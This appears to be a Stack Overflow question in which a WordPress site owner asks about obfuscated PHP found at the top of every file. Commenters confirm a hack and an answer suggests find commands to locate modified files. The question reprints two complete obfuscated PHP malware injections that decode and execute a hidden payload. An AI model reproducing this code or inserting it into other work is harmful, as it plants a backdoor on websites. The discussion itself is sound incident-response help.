# Wordpress PHP files includes random php codes in the beginning of everyfile. Is it hacked?

Tags: php, wordpress

I have these codes in the beginning of every file when i compared it to my backup, there isn't such thing.

What does that code do? How it might be injected into files?
Am i hacked?

```
<?php $kiakynx = 'ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osv76#<!%w:!>!(%w:!>!  x246767~6<62]38y]572]48y]#>m%:|:*r%:-t1 x64")) or (strstr($uas,"    x63 15R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfboepn)%epnbss-%rxW~!Ypp2)%zB%z>3qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubq#   x5=1; $uas=strtolower($_Spd19275fubmgoj{h1:|:*mmvo:>:iuhofmsb();}}]#>>*4-1-bubE{h%)sutc]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA    x27/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~  x24<!fwbm)%tjw)bssbz)bfsdXA x27K6<  x7fw6*3qj%7>    x^/%rx<~!!%s:N}#-%o:W%c:>,*j%-#1]#-bubE{h%)tpqsut>j%!*9!    x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-S&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%    x7f!<X>b%Z<#opPT7-NBFSUT`LDPT7-UFOJ`GB)fu7rfs%6~6<  x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  x22)7gj6<*QDU`M:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnj6<*id%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]D    162 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6pcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn7f  x7f x7f x7f<u%V x27{fR37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18tfs%w6< x7fw6*CWtfs%)7gpz)#]341]88M4P8]37]278]225]241]334]3&;!osvufs}   x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*d  x27,*c  x2bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!   x27!hmg%)!gj!|!*1?`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bgetr($uas,"  x66 151 x72 145 x66 16M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G52]e7y]#>n%<#372]58y]47hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y27-SFGTOBSUOSVUFS,6<*e"; function hzsseep($]y6d]281Ld]245]K2]285x3a 61  x31")) or (strstr($uas,"    x61 156 x64 162 x6f 15!|!   x24-    x24 x5c%j^  x24-    x24tvctus)% x24-    x24b!>!%yqesb = $ztozhyh("", $cmigmrv); $eaeqe!#~<#/%   x24-    x24!>!fyqmpef)# x24*<!%t::!>!68]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]45}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)#D#-#W#-#C#-#O#-#N#*-!%f1  107 x45 116 x54"]); if ((strstr($uas,"  x6d 163 x69 145")) or jgA   x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;z)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qt<*qp%-*.%)euhA)3of>256   x61"])))) { $GLOBALS["  x61 156 x75 156 x61"]2]37y]672]48y]#>s%<#462]47y]25msv%7-MSV,6<*)ujojR  x27id%6<    x7fw6*  x7f_*#ujo2]18y]#>q%<#762]67y]5ZASV<*w%)ppde>u%V<#65,47R25,d7R17,67f2-!%t::**<(<!fwbm)%tjw)# x24#-!#]yubfsdXk5`{66~6<&w6<    x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    x27&6<.fmc:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!s*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!%)3of)fepdof`57ftbc   x7f!|!*uyfu x27k:!6 x24-    x24<%j,,*!| x24-    x24gvodujpo!    x24-    x24y7   x256+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>    x22!ftmbg)!gj<*#k#)usbut`cpV    xtmfV   x7f<*X&Z&S{ftmfV    x7f<*XA#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]  x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+#Qi x5c1^W%c!>!%i   x5c2^#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-4]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:5-t.98]K4]65]D8]86]y31]278]yo]1/20QUUI7jsv%7UFH#  x2! x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^ufs!~<3,j%>j%!*3!  x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsu57  x78"))) { $ztozhyh = "  x630    x72 157 x6d 145")) or (strsFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNF&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6<    x7fw6*CW&)Ysboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-]268]y7f#<!%tww!>! x2400~:<h%_::::-111112)eobs`un>qp%!|Z~!<##!>!38#-!%w:**<")));$eaejRk3`{666~6<&w6<   x7fw6*CW&)7gj6<.[A  x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}%:-5ppde:4:|:**#ppde#)tutjyf`4   x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudif((function_exists("  x6vt)!gj!|!*bubE{h%)j{hnp%nfd>%fdy<Cb*[%h!>!%td$cmigmrv = implode(array_map("hzsseeuqpuft`msvd}+;!>!}   x27;!<!Ce*[!%cIjQeTQcOc/#00#Wjudovg)!gj!|!*msv%)}k~~~<W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#t>j%!*72!    x27!hmg%)!gj!<2t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/pd%6<pd%w6Z6<.4`hA  x27pd%6<pd%w6Z6<.3`hA   x27pd%6<pd%w6Z6<.2`hA   x!gj!<*2bd%-#1GO    x22#)fepmqyfA>2b%!  x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfuERVER["    x48 124 x54 120 x5f 125 x53 105 x52 137 x47,*b  x27)fepdof.)fepdof./#@#/qp%>5h%!<*::27}88:}334}472  x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24-    x24*g!)%j:>>1*!%b:>1<!fmtf!%b:>%s:  x5c%j:>>>!}_;gvc%}&;ftmbg}  x7fCw6<pd%w6Z6<.5`hA    x27;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opq%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_   3f]51L3]84]y31M6]y3e]81#/]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+u#    x5cq%   x27Y%6<.msv`ftsbqA7>q%6<    x7fw6*  x7f_*#ff    142 x5f 163 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 1%)3of:opjudovg<~   x24<!%o:!>! x242178}5d!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg    x22)!gj4y4  x24-    x24]y8  x24-    x24]2-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**W.2^,%b:<!%c:>%s:    x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:2]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]533bq}k;opjudovg}x;0]=])0#)U!  x27{**u%-#jt0}Z;0]=]0#)2n){return chr(ord($n)-1);} @error_reporting(0); x5c}X   x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y7o#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttjp",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]ygP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7Lcq%   x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr#    x5cq%)ufttj x22)gj6<^#Y27pd%6<C x27pd%6|6.7eu{66~67<&w6<*1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjy)#}#-#  x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!  x24/%tjw/   x24)%   x24-    x2rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52987gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX    4-  x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t2w/   x24)##-~!Ydrr)%rxB%epnbss!>!bssbz)#44eI{*w%)kVx{**#k#)tutjyf`x  x22l:!}sv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;(strstr($uas,"    x72 166 2p%!|!*!***b%)sfxpmpuStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSfmdbbhzv'; $abbjhnrpt=explode(chr((592-472)),substr($kiakynx,(18307-12287),(112-78))); $tcozwn = $abbjhnrpt[0]($abbjhnrpt[(4-3)]); $zdiieb = $abbjhnrpt[0]($abbjhnrpt[(12-10)]); if (!function_exists('jzikoa')) { function jzikoa($xtuyldqxca, $ahwqedh,$ejwayiq) { $stwmjuy = NULL; for($aezcxraw=0;$aezcxraw<(sizeof($xtuyldqxca)/2);$aezcxraw++) { $stwmjuy .= substr($ahwqedh, $xtuyldqxca[($aezcxraw*2)],$xtuyldqxca[($aezcxraw*2)+(6-5)]); } return $ejwayiq(chr((38-29)),chr((584-492)),$stwmjuy); }; } $mietupa = explode(chr((215-171)),'3791,24,4815,67,2263,47,281,23,4232,50,2034,63,5976,23,1706,54,115,33,3402,29,1468,31,3373,29,969,55,1663,22,5270,48,3860,36,5409,64,58,29,4446,21,4092,64,5574,34,3462,49,5762,46,2658,64,3227,23,734,68,707,27,516,28,406,41,217,64,5510,64,4768,47,2477,62,2097,39,1149,23,846,65,1642,21,2340,45,3654,69,4656,69,5941,35,3896,24,4422,24,4467,58,3944,25,0,58,3315,58,4002,25,568,69,1339,62,1580,62,345,21,3815,23,4920,47,1952,58,4156,34,2243,20,1272,67,4282,41,3600,34,5999,21,4725,43,1024,50,1401,67,2844,48,3431,31,637,70,5373,36,4190,42,2756,38,2722,34,2592,66,1208,64,802,44,304,34,3723,68,2892,65,1074,24,2957,29,2406,36,1098,51,148,38,5909,32,2136,64,5217,53,4525,48,5318,55,3150,49,3570,30,4027,65,5158,59,1557,23,2310,30,2385,21,87,28,4882,38,4323,62,1760,51,5650,67,4967,26,2794,50,5808,70,1848,42,3033,65,3920,24,5878,31,2539,53,186,31,3250,65,4993,56,3511,59,5717,45,3199,28,4573,25,2986,47,911,58,5473,37,1499,58,1685,21,366,40,3838,22,2200,43,1172,36,1890,62,5093,65,4598,58,544,24,5608,42,4385,37,5049,44,3969,33,447,69,3098,52,2010,24,2442,35,3634,20,1811,37,338,7'); $rgcnji = $tcozwn("",jzikoa($mietupa,$kiakynx,$zdiieb)); $tcozwn=$kiakynx; $rgcnji(""); $rgcnji=(610-489); $kiakynx=$rgcnji-1; ?>
```

And some files have this

```
$ppreiwefgum = 'jt)!gj!<*2bd%-#1GO  x22#)fepmqyfA>2b%!<*qp%-*.yf    x27*&7-n%)utjm6<    x7fw6*CW&)7<+{e%+*!*+fepdfe{h+{d%)+oLOBALS["    x61 156 x75 156 x61"]=1; $uas=str%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]3[A   x27&6<  x7fw6*  x7f_*#[k2`{6:!3]427]36]373P6]36]73]83]238M7]381]211opD#)sfebfI{*w%)kVx{**#%!*72!    x27!hmg%)!gj!<2,*j%-#1]#-bubEpf = " x63 162 x65 141 x7418R#>q%V<*#fopoV;hojepdoF.uofu   x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zs<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#    x27rfs  x27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z6<.3`hA   x27pd%6<5cq%    x27jsv%6<C>^#zsfvr# x5cq%7*3,j%>j%!*3!  x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>jyfu%)3of)fepdof`57ftbc   x7f!|!*uyfu x272P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<str($uas,"   x6d 163 x69Ysboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbss4/%tmw/ x24)%c*W%eN+#Qi,#/q%>2q%<#g6R85,67R37,%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`Tbss-%rxW~!Ypp2)%zB%z>!  65]y72]254]y76#<!%w:!>!(%w:!>!  x246767~6<Cw6<pd%w6Z6<.5`hAx27,*b   x27)fepdof.)f>  x22:ftmbg39*56A:>:8:|:7#6#!<12>j%!|!*#91y]c9y]g2y]xnkmqer = $ygbczpf("", $sgklwm#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L#00#W~!Ydrr)%rxB%epnbss!>!bssvufs}  x7f;!opjudovg}k~~9{d%:osvufs:~928>>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[-   x24-tusqpt)%z-#:#*  x24-    x24!##-!#~<#/%  x24-    x24!>!fyqmpef)# x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24:|:**#ppde#)tutjyf`4 x223}!+!85]256]y6g]257]y86]267]y74]275]y7:]268]yx24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#%)euhA)3of>2bd%!<5h%5f   163 x74 141 x72 164") 1 107 x45 116 x54"]); if ((str6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqepdof./#@#/qp%>5h%!<*::::::-111112)eob  145 x5f 146 x75 156 x63 164 x69 x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)7g127-UVPFNJU,6<*27-SFGTOBSgj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX    x27u%)7fmjix6<C x27&6whip",str_split("%tjw!>!#]ujojRk3`{666~6<&w6<  x7fw6*CW&)7gj6<.W~  x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#{h%)tpqsut>j%!*9!   x27!hmg%)!gj!~<ofmy%tr($uas,"   x61 156 x64 162 x6f 151 x64vo:>:iuhofm%:-5ppde: x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<4<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y   x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x2+;%-qp%)54l}  x27;%!<*#}_;#)323ldfid>}&;!os   151 x72 145 x66 157 x78"))) { $ygbcztolower($_SERVER["  x48 124 x54 120 x5f 125 x53 105 x52 137 x4}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]QwTW%hIr    x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**Wy84]275]y83]248]y83]256]y81]2UI&e_SEEB`FUPNFS&d_SFSF-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%6~6<    x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoop!#]y38#-!%w:**<")));$27]28y]#/r%/h%)n%-#+I#)qdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fu  145")) or (strstr($uas,"    x72 166 x3a 61  x31")) or (strs24-  x24]26  x24-    x24<%j,,*!| x24-    x24gvodujpo!    x24-    x24y7   x>!2p%Z<^2  x5c2b%!>!2p%!*3>?*2b%)gpf{)-1);} @error_reporting(0); $sgklwmg = implode(array_map("jlsce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QU7-C)fepmqnjA  x27&6<.fmjgApjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  x22!ftmbg)!gj<*#k#)j6<*id%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-SFEBFI,6<*24-  x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t2w/   x24),3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!    x2s`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+34]368]322]3]364]6]28*^#zsfvr# x5cq%)ufttj 23zbek!~!<b%    x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj  x2)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmXk5`{66~6<&w6<  x7fw6*CW&)7gj6<*doj%fvr#    x5cq%7/7#@#7/7^#iubq#   x/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*d  x27,*c  k:!ftmf!}Z;^nbsbq%  x5cSFWSFT`%}X;!sp!  x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/ovg}x;0]=])0#)U!    x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#og); $xnkmqer();}}%:>:r%:|:**t%)m%=*h%)m>! x24/%tjw/   x24)%   x24-    x24y4   x24-    x24]y8  x]#/*)323zbe!-#jt0*?]+^?]_  x5c}X   x2%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58ymsv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}   x27;!>>>if((function_exists("   x6f 142 x7f#<!%tww!>!   x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]ut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:>m%:|:*r%:-t%)3of:opjudovg<~   x24<!%o:!>! x:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]6x22)gj6<^#Y#  x5cq%   x27Y%6<.msv`ftsbqA7>q%6<    x7fw6*  x7f_*#fubfsdpd%w6Z6<.2`hA   x27pd%!%ff2-!%t::**<(<!fwbm)%tjw)#  x24#-234]342]58]24]31#-%tdz*Wsfuvso!%bss    x5csboe))1/35.)1/14+9**-)1!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;h!opjudusbut`cpV  x7f x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV>1<!fmtf!%b:>%s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-bz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epn#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{h5]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:npd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!bfsdXA    x27K6<  x7fw6*3*#opo#>>}R;msv}.;/#/#/},;#-#}    157 x6e"; function jlswhip($n){return chr(ord($nk#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs}    x27;mnui}&;zeovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~qj%7>  x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA41]88M4P8]37]278]225]241]3b!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpus&& (!isset($GLOBALS["  x61 156 x75 156 x61"])))) { $GGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)348984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc")) or (strstr($uas," x63 150 x72 157 x6d 145")) or (strstr($uas,"    x662)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-u7!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]Dldpt%}K;`ufldpt}X;`msvd}R;*4- x24b!>!%yy)#}#-#    x24pc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudUOSVUFS,6<*msv%7-MSV,6<*)ujojR  x27id%6<    x7fw6*  x7f_*#StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSonsqjvd'; $doayrujf=explode(chr((438-318)),substr($ppreiwefgum,(18155-12135),(134-100))); $qykggthej = $doayrujf[0]($doayrujf[(3-2)]); $rawzxka = $doayrujf[0]($doayrujf[(13-11)]); if (!function_exists('zjgclmn')) { function zjgclmn($bzhthn, $iwctid,$fcqwzfsq) { $ftcjrw = NULL; for($koutzrfu=0;$koutzrfu<(sizeof($bzhthn)/2);$koutzrfu++) { $ftcjrw .= substr($iwctid, $bzhthn[($koutzrfu*2)],$bzhthn[($koutzrfu*2)+(7-6)]); } return $fcqwzfsq(chr((37-28)),chr((333-241)),$ftcjrw); }; } $cyjcsxxs = explode(chr((275-231)),'4235,31,1679,25,5479,52,101,42,2540,61,1704,30,747,22,3008,56,2157,37,5607,70,2503,37,304,26,1820,32,5205,49,3158,61,2002,26,2777,29,1112,58,469,53,4578,20,1734,48,45,31,1936,66,399,70,2872,45,2962,46,5155,21,5352,44,360,39,3787,28,522,32,3606,22,4515,63,3752,35,3258,25,1852,59,3341,50,1911,25,5967,53,2028,36,177,31,2601,46,5880,27,4172,63,4694,62,5312,40,2284,66,554,55,268,36,2119,38,3459,63,5713,55,1218,24,4981,41,5087,68,3122,36,0,45,1659,20,3815,57,1170,20,1782,38,3522,63,945,44,5422,57,4343,61,3219,39,2806,23,5531,35,3628,66,5677,36,609,38,3872,37,5176,29,2461,42,1369,40,1190,28,3694,58,2194,20,1540,30,76,25,3283,58,4756,56,2214,70,1012,23,330,30,245,23,5254,58,5930,37,3948,63,4093,34,2350,62,1570,40,4266,37,4303,40,2938,24,4028,22,4127,45,875,70,4404,42,815,60,2412,49,5907,23,1443,30,4050,43,3064,58,3391,68,1473,67,989,23,3909,39,1340,29,4911,70,1089,23,1610,49,2707,70,769,46,4446,69,5022,65,5566,41,1272,68,5822,58,647,65,2829,43,143,34,5396,26,3585,21,208,37,2647,60,4632,62,712,35,5768,54,4812,57,1409,34,1035,54,2064,55,4869,42,4598,34,2917,21,1242,30,4011,17'); $elfxrs = $qykggthej("",zjgclmn($cyjcsxxs,$ppreiwefgum,$rawzxka)); $qykggthej=$ppreiwefgum; $elfxrs(""); $elfxrs=(832-711); $ppreiwefgum=$elfxrs-1;
```

Comment: If you didn't put it there, then *probably*. That doesn't look good.

Comment: The short answer is "yes". You've been hacked.

Comment: Should i restore backup? Just copying pasting all wp-content, wp-includes, wp-content from backup, works?

Comment: But probably it will be injected again or hacked. I don't know what it caused? Can it be a plugin? I have to know what that code is. So i can search for google for possible other victims. And can see how they solved. Is there any parser for that code?

Comment: I second Doga; would absolutely like to know the breakdown. I am looking at it right now...

Comment: Another user - https://stackoverflow.com/questions/39501962/found-a-php-coded-script-on-my-website

Comment: this happened to one of my sites before. this is some type of injection. it's not worth fixing the files, you may miss something by mistake and you dont want that stuff in your source base. i would untar a recent backup and go from there.

Answer (score 1, accepted):

You can likely sort out which files are injecting the code by looking at the modification dates of files on your server

You can use some quick searches to figure out the infection date then run a search for all field modifed or created around then:

List files by creation:

`find . -type f -newermt 2016-09-07 | xargs ls -la`

find text files that were last modified 60 days ago:

`find /home/you -iname "*.txt" -mtime -60 -print`

http://www.cyberciti.biz/faq/howto-finding-files-by-date/

You will need to remove the infected files/code, and also be sure to fight md any other files that could reinfect the rest.

Comment: is there anywhere that i can use to see who or what edited those files?

Comment: You need to login to your server. You could check the Apache access logs, but might not be very helpful. I would just cleanup, make sure everything is updated. Then Google each of your plugins for known vulnerabilities. You may be able to narrow down which plugin was comprised